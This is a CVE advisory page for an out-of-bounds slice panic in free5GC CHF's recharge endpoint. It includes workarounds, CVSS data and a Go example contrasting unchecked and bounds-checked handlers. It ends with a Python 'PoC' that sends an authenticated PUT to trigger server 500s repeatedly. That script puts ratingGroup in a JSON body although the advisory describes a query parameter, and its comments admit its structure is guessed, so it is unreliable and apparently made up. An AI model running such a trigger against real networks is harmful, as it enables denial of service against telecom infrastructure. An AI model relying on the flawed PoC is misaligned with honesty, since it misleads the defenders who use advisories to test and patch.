Security Vulnerability Report
CVE-2026-32937 CVSS 6.5 MEDIUM

CVE-2026-32937

Published: 2026-03-20 03:16:01
Last Modified: 2026-03-27 17:21:06

Description

free5GC is an open source 5G core network. free5GC CHF prior to version 1.2.2 has an out-of-bounds slice access vulnerability in the CHF `nchf-convergedcharging` service. A valid authenticated request to PUT `/nchf-convergedcharging/v3/recharging/:ueId?ratingGroup=...` can trigger a server-side panic in `github.com/free5gc/chf/internal/sbi.(*Server).RechargePut(...)` due to an out-of-range slice access. In the reported runtime, Gin recovery converts the panic into HTTP 500, but the recharge path remains remotely panic-triggerable and can be abused repeatedly to degrade recharge functionality and flood logs. In deployments without equivalent recovery handling, this panic may cause more severe service disruption. free5GC CHF patches the issue. Some workarounds are available: Restrict access to the `nchf-convergedcharging` recharge endpoint to strictly trusted NF callers only; apply rate limiting or network ACLs in front of the CHF SBI interface to reduce repeated panic-trigger attempts; if the recharge API is not required, temporarily disable or block external reachability to this route; and/or ensure panic recovery, monitoring, and alerting are enabled.
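
An added illustration of the bug class described above, not free5GC's code: a hypothetical handler indexes a slice with a value taken from the `ratingGroup` query parameter, shown with and without a bounds check, behind a recover wrapper that stands in for Gin's recovery middleware. The handler logic, function names and the `quotas` data are assumptions; the page does not show the actual `RechargePut` source.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strconv"
)

// Constructed sample data (hypothetical): one quota per rating-group slot.
var quotas = []int{100, 250, 500}

// recoverMW stands in for Gin's recovery middleware: a panic becomes HTTP 500.
func recoverMW(next http.HandlerFunc) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		defer func() {
			if recover() != nil {
				http.Error(w, "internal error", http.StatusInternalServerError)
			}
		}()
		next(w, r)
	}
}

// recharge is a hypothetical handler; checked selects the bounds-checked path.
func recharge(checked bool) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		idx, err := strconv.Atoi(r.URL.Query().Get("ratingGroup"))
		if err != nil {
			http.Error(w, "bad ratingGroup", http.StatusBadRequest)
			return
		}
		// Hardened form: reject out-of-range input with 400 before indexing.
		if checked && (idx < 0 || idx >= len(quotas)) {
			http.Error(w, "unknown ratingGroup", http.StatusBadRequest)
			return
		}
		fmt.Fprint(w, quotas[idx]) // unchecked form panics here when idx is out of range
	}
}

// status sends one PUT through the recovery wrapper and returns the HTTP status.
func status(checked bool, ratingGroup string) int {
	url := "/nchf-convergedcharging/v3/recharging/imsi-test?ratingGroup=" + ratingGroup
	rec := httptest.NewRecorder()
	recoverMW(recharge(checked))(rec, httptest.NewRequest(http.MethodPut, url, nil))
	return rec.Code
}

func main() {
	fmt.Println(status(false, "7"), status(true, "7"), status(true, "1")) // 500 400 200
}
```

With the check in place the same request is a client error (400) rather than a recovered panic (500), so a run of 500s on the recharge route remains a meaningful alerting signal.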

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:free5gc:free5gc:*:*:*:*:*:*:*:* - VULNERABLE
free5GC CHF < 1.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

"""
PoC for CVE-2026-32937
Trigger out-of-bounds slice access in free5GC CHF.
Requires authentication.
"""


def exploit(target_url, access_token):
    headers = {
        "Authorization": f"Bearer {access_token}",
        "Content-Type": "application/json"
    }

    # Malicious payload designed to trigger out-of-bounds access
    # The specific value depends on the internal slice logic, usually an index or malformed ID
    ue_id = "imsi-999999999999999"
    payload = {
        # Structure depends on the API expectation, simplified for PoC
        "ratingGroup": [999]
    }

    # Vulnerable endpoint
    url = f"{target_url}/nchf-convergedcharging/v3/recharging/{ue_id}"

    try:
        response = requests.put(url, headers=headers, json=payload, timeout=5)
        if response.status_code == 500:
            print("[+] Potential trigger successful: Server returned 500 Internal Server Error.")
        else:
            print(f"[-] Request returned status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Request failed: {e}")


if __name__ == "__main__":
    target = "http://<free5gc-chf-ip>:<port>"
    token = "<valid_auth_token>"
    exploit(target, token)
```
